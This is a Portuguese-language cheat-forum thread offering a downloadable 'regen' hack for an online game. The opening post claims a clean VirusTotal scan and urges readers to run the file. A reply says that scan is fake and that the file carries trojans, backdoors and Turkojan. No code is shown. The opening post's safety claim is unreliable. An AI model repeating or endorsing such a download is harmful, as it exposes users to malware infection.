Ir para conteúdo
Faça parte da equipe! (2024) ×

Novo Hack De Regen Bpt 31/03/2013


 Compartilhar

Posts Recomendados

Ola pessoal Acabei de comprar esse hack de um cara da net esta funfando de boa so e regen e vim aki postar pra galerinha pois esta muito dificil arrumar hj blz

 

scan: https://www.virustotal.com/en/file/20bec31a606590f751d211e7ff9603ae3aace54eb25e34686fdfd2acc260c3a7/analysis/

 

ta ai quem quiser e so baixar se nao quiser tambem faz favor nao critica so testei no windows xp quem testar nos demais sistemas por favor da um toque aki

 

download : Hack Regen BPT - Download - 4shared

 

E muito simpre de usar e so executar ele e abrir o game.exe os regens ja vem ativado vlw ai pessoal e desculpa por nao saber postar direito acho que ta bom ate mais !!!!!!!!

Link para o comentário
Compartilhar em outros sites

Scan Falso: :fuck:

Novo Scan: https://www.virustotal.com/en/file/b0d0d7390de5f55fe7941daf50f9a0d0d0f7bd62393f0cf15d9be804e59e4eda/analysis/ :nerd:

Lotado de trojan , backdoor , sky e o virus do turkojan

e esse Regen nao e seu poem creditos pro cara q fez :fuck:

 

 

 

 

 

webcheats.jpg

E se ainda não deu certo é porque não chegou até o fim :sarcastico:

<?php
  echo "Não Sei Programa!";
?>

Link para o comentário
Compartilhar em outros sites

entao gente funfa ou nao ? unica coisa que vi com tantos virus assim e funfava deboa era injector perX + sei la arquivo com senha nao muito seguro vou espera + posts

Galera um amigo me disse uma vez ao infinito e alem mais cuidado com cada passo ^^)

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.